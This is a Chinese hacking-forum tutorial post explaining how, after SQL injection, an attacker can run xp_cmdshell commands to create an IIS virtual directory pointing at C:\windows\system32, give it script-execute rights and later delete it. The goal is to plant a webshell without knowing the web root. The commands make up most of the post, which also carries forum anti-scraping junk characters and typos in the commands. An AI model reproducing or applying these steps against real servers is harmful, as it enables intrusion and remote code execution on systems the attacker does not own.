返回列表 发帖

[原创教程] 如何SQL注入建立虚拟目录

很多情况下我们都会遇到SQL注入可以列目录和运行命令,但是却很不容易找到web所在目录,也就不好得到一个webshell,应该算是无意中发现了一招,感觉不错 整理下发上来给大家分享:  _! d& _( J, x5 R  v: N4 A

' f( i9 h& l4 Y+ Y, K# x% Lexec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"'
0 R! l' {6 E/ |建立虚拟目录win,指向c:\windows\system32+ V% A  ^! H. G
exec master.dbo.xp_cmdshell 'cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture'
$ y5 `& G) I: }让win句有解析asp脚本权限
0 @' b, N6 g9 Z" v
( h4 G+ ]2 N+ |7 ?exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"9 c) w/ n$ s0 e, a1 p* ^
删除虚拟目录。0 x3 C1 r3 _6 r& x
找不到web绝对路径的一种解决办法,
9 z, i- ]% C; `* }" o0 Y) C( g+ K6 a' g
403错误,表示虚拟目录建好了。。
1

评分人数

呀  LZ好久不见你上了啊

TOP

返回列表